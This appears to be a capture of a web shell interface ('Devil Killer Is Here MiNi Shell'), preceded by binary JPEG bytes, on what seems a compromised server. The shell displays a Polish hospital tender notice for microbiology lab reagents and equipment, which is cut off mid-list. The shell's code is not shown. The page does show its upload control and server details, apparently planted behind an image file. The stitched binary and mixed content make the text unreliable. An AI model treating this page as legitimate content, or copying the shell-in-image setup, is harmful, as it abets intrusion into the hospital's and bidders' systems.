JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241220/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241220/0066774301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dzierżawę aparatu do identyfikacji i antybiogramów, dzierżawa aparatu do posiewów krwi, barwiarki oraz dostawa odczynników na 36 m-cy oraz obsługa serwisowa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910333036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szpitalna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radziejów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@szpitalradziejow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpitalradziejow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dzierżawę aparatu do identyfikacji i antybiogramów, dzierżawa aparatu do posiewów krwi, barwiarki oraz dostawa odczynników na 36 m-cy oraz obsługa serwisowa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-68ca525c-0b00-4f8d-b91f-38c0912ccd4e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00667743</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/transakcja/1040778 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji<br/>elektronicznej za pośrednictwem Platformy zakupowej pod adresem : https://www.platformazakupowa.pl/pn/szpitalradziejow. W<br/>postepowaniu komunikacji między Zamawiającym a Wykonawcami , w szczególności składanie ofert oraz wszelkich oświadczeń i<br/>dokumentów odbywa się przy użyciu Platformy. Za datę wpływu oświadczeń ,wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich wczytania do Platformy.<br/>2.Instrukcja korzystania z Platformy:<br/>1) w przypadku posiadania konta na Platformie-zgłoszenie do postepowania wymaga zalogowania wykonawcy z Platformy;<br/>2) jeżeli Użytkownik nie ma konta na platformazakupowa.pl-składa Ofertę bez zakładania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.Niezbędne wymagania sprzętowe<br/>aplikacyjne umożliwiające pracę na Platformie:<br/>1) dla dokumentów w formie &#34;pdf&#34; zaleca się podpis formatem PAdES,<br/>2)minimalne wymagania techniczne umożliwiające korzystanie ze Strony platformazakupowa.pl to przeglądarka internetowa Internet<br/>Explorer, Chrome i FireFox w najnowszej dostępnej wersji ,z włączoną obsługą języka Javascript, akceptująca pliki typu &#34;cookies&#34;<br/>oraz łącze internetowe o przepustowości, co najmniej 256 kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej<br/>rozdzielczości ekranu 1024x768 pikseli.<br/>3) Zamawiający dopuszcza przesyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa ,tj.0.in. : doc, docx, txt,<br/>xls, xxlsx, ppt, csv, pdf, jpg, png, tif, dwg, zip, rar, 7zip, przy czym zaleca się wykorzystanie plików w formie .pdf.<br/>4. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>1) dla dokumentów w formie &#34;pdf&#34; zaleca się podpis formatem PAdES,<br/>2) dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES.<br/>5. Informacja na temat kodowania i czasu odbioru danych:<br/>1) pliki Oferty załączone przez Wykonawcę na Platformie i zapisane, widoczne są w Platformie jako zaszyfrowane. Możliwość<br/>otworzenia plików dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert;<br/>2) oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”.<br/>6. Dokumentacja przedmiotowego postępowania dostępna jest na Platformie w zakładce „Załączniki”.<br/>7. Ofertę składa się pod rygorem nieważności w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym.<br/>8. Dokumenty, o których mowa w rozdziale XI SWZ należy złożyć w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym, podpisem osobistym, podpisem zaufanym.<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email<br/>poczta@szpitalradziejow.pl Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016), dalej „RODO”, informuję, że:<br/>1. Wykonawca dodatkowo oświadcza , iż został poinformowany o tym, że:<br/>1) administratorem danych osobowych pozyskanych bezpośrednio od osób fizycznych jest Samodzielny Publiczny Zakład Opieki<br/>Zdrowotnej w Radziejowie z siedzibą przy ulicy Szpitalnej 3.<br/>2) 2.inspektorem ochrony danych osobowych jest: Sylwia Bojanowska-Dekert tel. 515 291 178<br/>e-mail:iod@szpitalradziejow.pl<br/>3) ww. dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami ww. danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (tj. Dz. U z 2019 r., poz. 2019,<br/>ze zm.), dalej „ustawa Pzp”; ww. dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5) obowiązek podania danych osobowych (pozyskanych przez Zamawiającego bezpośrednio od osób fizycznych w przedmiotowym<br/>postępowaniu) dotyczących tych osób jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>6) w odniesieniu do ww. danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>7) osoby fizyczne, których dane Zamawiający pozyskał bezpośrednio posiadają:<br/>1) na podstawie art. 15 RODO prawo dostępu do własnych danych osobowych;<br/>2) na podstawie art. 16 RODO prawo do sprostowania własnych danych osobowych *;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania własnych danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba, której dane dotyczą uzna, że<br/>przetwarzanie jej danych osobowych narusza przepisy RODO;<br/>1) osobom fizycznym, których dane Zamawiający pozyskał bezpośrednio w przedmiotowym postępowaniu nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu<br/>oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP-18/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">10</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ilość oznazeń na rok	iloś oznaczeń w ciągu 36 m-y<br/>Karty do identyfikacji bakterii Gram–ujemnych	50,00	150<br/>Karty do dentyfikacji bakterii Gram–dodatnich 40	120<br/>Karty do identyfikacji grzybów drożdżopodobnych	20	60<br/>Karty do identyfikacji bakterii beztlenowych oraz z rodzaju Corynebaterium	20	60<br/>Karty antybiogramowe dla bakterii Gram–ujemnych	120	360<br/>Karty antybiogramowe dla bakterii Gram–dodatnich	120	360<br/>Karty antybiogramowe dla bakterii Gram-ujemnych -wielolekoopornych	10	30<br/>Karty antybiogramowe dla paciorkowców	20	60<br/>Karty antybiogramowe dla bakterii grzybów drożdżopodobnych	20	60<br/>Karty antybiogramowe dla Enterococcus	20	60<br/>Zestaw niezbędnych odzynników wymaganych do przeprowadzenia identyfikacji i oznaczania lekowrażliwości	ilość odpowiednia do wykonania w/w testów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">38434000-6 - Analizatory</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa produktu	j.m/ilość	<br/>Zastaw lateksowy do wykrywania podstawowych antygenów paciorkowcowych (grupa A – G) a’ 60	op.	3<br/>Emzym do testu z pozycji powyżej a&#39; 60	op.	3<br/>Dezoksycholan sodu ampułki a, 0,5 ml (op. = 50 sztuk) - test rozpuszczalności metodą probówkową oraz bezpośrednnio z kolonii	op.	3<br/>Osocze królicze do określania czynnika CF i wolnej koagulazy z 0,15 % EDTA (fiolki 6 x 5 ml). op.	6<br/>Zestaw diagnostyczny do szybkiej identyfikacji bakterii wytwarzajacych karbapenemazy, Test bezodczynnikowy, jednoetapowy, bez konieczności wielokrotnego przenoszenia zawiesiny, Wykrywa karbapenemazy klasy A,B,D u Enterobacteriaceae, Pseudomonas spp. Specyficzność 100%, czułość nie mniej niż 97%	op.	6<br/>Błękit laktofenolowy do barwienia grzybów op.	3<br/>Test paskowy diagnostyczny do wykrywania aktywności enzymu pyrrolidonylarylamidazy. Pasek jest stosowany do potwierdzania Streptococcus pyogenes i przynależności do rodzaju Enterococcus.	op.	3<br/>Odczynnik do testu wyżej wymienionego op.	2<br/>Testy paskowe do oznaczania oksydazy op. 50 szt	op.	3<br/>Escherichia coli ATCC 25922	opk.	2<br/>Escherichia coli ATCC 35218	opk.	2<br/>Pseudomonas aeruginosa ATCC 27853	opk.	2<br/>Staphylococcus aureus ATCC 29213	opk.	2<br/>Enterococcus faecalis ATCC 29212	opk.	2<br/>Streptococcus pneumoniae ATCC 49619	opk.	2<br/>Haemophilus influenzae NCTC 8468	opk.	2<br/>Haemophilus influenzae ATCC 49766	opk.	2<br/>Staphylococcus aureus NCTC 12493	opk.	2<br/>Klebsiella pneumoniae ATCC 700603	opk.	2<br/>Campylobacter jejuni ATCC 33560	opk.	2<br/>Kriobanki	szt	2<br/>Torebki do wytwarzanie atmosfery beztlenowej w puszkach a&#39;10 szt	opk.	30<br/>Torebki do wytwarzania atmosfery beztlenowej w torebkach a&#39;10szt	opk.	20<br/>Paskowy wskaźnik warunków beztlenowych	opk.	4<br/>Puszka do hodowli drobnoustrojów beztlenowych	szt	1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Nazwa artykułu	j.m./Ilość	<br/>1.	Oxacylina 1ug a` 50 krążków	op. 5<br/>2.	Penicylina 1 ug a` 50 krążków	op. 6<br/>3.	Ampicylina 10ug a` 50 krążków	op. 20<br/>4.	Ampicylina 2 ug a` 50 krążków	op. 6<br/>5.	Amoksycylina/kw.klawulanowy 2/1ug a` 50 krążków	op. 2<br/>6.	Piperacylina 30 ug a` 50 krążków	op. 2<br/>7.	Amoksycylina/kw.klawulanowy 20/10ug a` 50 krążków	op. 20<br/>8.	Ampicylina/sulbaktam 10/10ug a` 50 krążków	op. 4<br/>9.	Tikarcylina/kw.klawulanowy 75/10ug a` 50 krążków	op. 2<br/>10.	Piperacylina/tazobaktam 30/6ug a` 50 krążków	op. 8<br/>11.	Imipenem 10ug a` 50 krążków	op. 16<br/>12.	Meropenem 10ug a` 50 krążków	op. 150<br/>13.	Ertapenem 10ug a` 50 krążków	op. 3<br/>14.	Aztreonam 30ug a` 50 krążków	op. 6<br/>15.	Cefaleksyna 30ug a` 50 krążków	op. 12<br/>16.	Cefuroksym 30ug a` 50 krążków	op. 20<br/>17.	Cefotaksym 30 ug a` 50 krążków	op. 4<br/>18.	Cefotaksym 5 ug a` 50 krążków	op. 20<br/>19.	Ceftazidym 30ug a` 50 krążków	op. 6<br/>20.	Ceftazidym 10ug a` 50 krążków	op. 20<br/>21.	Ceftibuten 30ug a` 50 krążków	op. 10<br/>22.	Ceftriakson 30ug a` 50 krążków	op. 2<br/>23.	Ceftarolina 5 ug a` 50 krążków	op. 6<br/>24.	Cefepime 30ug a` 50 krążków	op. 6<br/>25.	Cefoksytyna 30ug a` 50 krążków	op. 10<br/>26.	Doxycycline 30ug a` 50 krążków	op. 5<br/>27.	Gentamycyna 30 ug a` 50 krążków	op. 4<br/>28.	Gentamycyna 10ug a` 50 krążków	op. 20<br/>29.	Amikacyna 30ug a` 50 krążków	op. 20<br/>30.	Netylmycyna 10 ug a`50 krążków	op. 2<br/>31.	Erytromycyna 15ug a` 50 krążków	op. 16<br/>32.	Klindamycyna 2ug a` 50 krążków	op. 16<br/>33.	Chimpristine/Dalfopristine 15ug a` 50 krążków	op. 6<br/>34.	Tetracyklina 30ug a` 50 krążków	op. 2<br/>35.	Tygecyklina 15ug a` 50 krążków	op. 2<br/>36.	Temocylina 30 ug a` 50 krążków	op. 2<br/>37.	Nitrofurantoina 100 ug a` 50 krążków	op. 20<br/>38.	Nitroxolin op. 2<br/>39.	Teikoplanina 